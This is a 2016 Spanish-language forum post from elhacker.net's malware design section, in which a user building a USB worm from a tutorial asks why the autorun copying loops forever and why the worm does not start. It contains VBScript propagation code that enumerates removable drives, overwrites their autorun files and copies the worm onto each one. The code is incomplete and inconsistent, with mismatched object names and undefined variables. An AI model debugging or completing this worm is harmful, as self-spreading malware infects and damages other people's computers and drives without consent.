Foro de elhacker.net

Seguridad Informática => Análisis y Diseño de Malware => Mensaje iniciado por: Borito30 en 21 Diciembre 2016, 13:06 pm



Título: mejorar este gusano*
Publicado por: Borito30 en 21 Diciembre 2016, 13:06 pm
Hola estoy siguiendo el manual de octalh para crear un gusano, referencia:
Citar
http://foro.elhacker.net/analisis_y_diseno_de_malware/taller_crea_tu_primer_w0rm_gusano-t191563.0.html

El autorun lo hace pero se queda todo el rato haciendolo. También estoy intentando aprender a hacer uno con shorcut's pero no se como funcionan. Mi pregunta es porque no finaliza de crear de el autorun. Posdata: creo porque el loop hace que nunca finalice (cuando digo no funcione cuando conecto el usb no arranca el gusano supongo que sera porque debo ejecutar algo no sé exactamente el que)

Es decir se me queda todo el rato con el usb parpadeando y pienso que será por el loop. Habría una forma de evitar que cuando se haya copiado haga break y se salga del loop?

Y lo segundo es cuando se copia el autorun, quito el gusano y tal, y pongo otra vez de nuevo el usb el gusano no se arranca en mi ordenador¿Puede que el autorun este dañado pienso? Tenga que modificarlo de alguna manera.

Código:
do ' inicia loop infinito
Set oFS = Wscript.CreateObject("Scripting.FileSystemObject")
Set oDrives = oFS.Drives 'declaramos todos los srivers
For Each Drive in oDrives 'por cada driver
    If Drive.DriveType = DriveTypeRemovable Then 'si son del tipo removible entonces
        If Drive.DriveLetter <> "A" Then ' si la letra es de A-Z entonces
            If fso.FileExists(Drive.DriveLetter + autorunusb) Then ' si existe autorun
               set cFile = fso.GetFile (Drive.DriveLetter + autorunusb)'tomalo y
               cFile.attributes = 0 ' quitale los atributos
               fso.CopyFile autorun, Drive.DriveLetter & autorunusb , true'despues copialo
           else' de lo contrario
      fso.CopyFile autorun, Drive.DriveLetter & autorunusb , true' copialo
   End if
fso.CopyFile w0rmpatch, Drive.DriveLetter & w0rmusb , true' copia el gusano a la unidad
End If
End If
Next
loop
end sub